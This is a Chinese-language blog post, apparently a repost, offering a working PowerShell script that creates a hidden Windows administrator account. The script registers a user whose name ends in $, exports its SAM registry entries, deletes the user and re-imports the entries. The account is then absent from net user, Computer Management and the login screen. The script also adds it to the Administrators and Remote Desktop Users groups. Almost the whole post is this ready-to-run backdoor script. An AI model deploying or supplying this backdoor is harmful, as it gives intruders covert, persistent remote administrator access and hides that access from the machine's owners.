windows创建隐藏用户的powershell脚本

2021-03-06 22:30

阅读:782

标签:注册   remote   username   mes   登陆   domain   pattern   min   and   

通过保存并重新注册已删除用户的注册表的方式来隐藏用户,未登录时登陆界面不可见,登陆后可见

方法详情见:

https://www.k0rz3n.com/2018/06/26/windows%E6%B8%97%E9%80%8F%E4%B8%AD%E5%90%8E%E9%97%A8%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%96%B9%E6%B3%95%E6%8E%A2%E7%A9%B6/#0X04-%E5%8D%87%E5%8D%8E%EF%BC%9A%E7%9C%9F%E6%AD%A3%E7%9A%84%E9%9A%90%E8%97%8F%EF%BC%8C%E7%AE%A1%E7%90%86%E5%91%98%E6%88%BF%E9%97%B4%E7%9A%84%E5%8F%A6%E4%B8%80%E6%89%87%E9%97%A8

中的第4种方法


powershell脚本如下:
#生成隐藏用户脚本,需要管理员权限运行
#Usage:CreateUser.ps1
#用户名使用$结尾
#创建的用户在计算机管理界面,net user,登陆界面不可见.当隐藏用户处于登陆状态时,用户在登陆界面可见
param(
[string] $user,
[string] $pwd
)
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
$checkname = $user -match ‘.+\$$‘
if(-not $checkname){
Write-Host "Username should end with ‘$‘"
exit
}
$exist = $adsi.Children | where {$_.SchemaClassName -eq ‘user‘ -and $_.Name -eq $user}
if($exist){
Write-Host "$user already existed"
exit
}
$is_admin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")
if(-not $is_admin){
Write-Host "Administrator privileged need"
exit
}
net user $user $pwd /add | Out-Null
cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user"" | Out-Null
$file = Get-Content "$env:temp\$user.reg" | Out-String
$pattern="@=hex\((.*?)\)\:"
$file -match $pattern |Out-Null
$key = "00000"+$matches[1]
cmd /c "regedit /e $env:temp\$key.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$key"" | Out-Null
net user $user /del | Out-Null
cmd /c "regedit /s $env:temp/$user.reg" | Out-Null
cmd /c "regedit /s $env:temp/$key.reg" | Out-Null
Remove-Item $env:temp/$user.reg
Remove-Item $env:temp/$key.reg
net localgroup "Administrators" $user /add | Out-Null
net localgroup "Remote Desktop Users" $user /add | Out-Null

windows创建隐藏用户的powershell脚本

标签:注册   remote   username   mes   登陆   domain   pattern   min   and   

原文地址:https://www.cnblogs.com/ic3s3137/p/12841998.html


评论


亲,登录后才可以留言!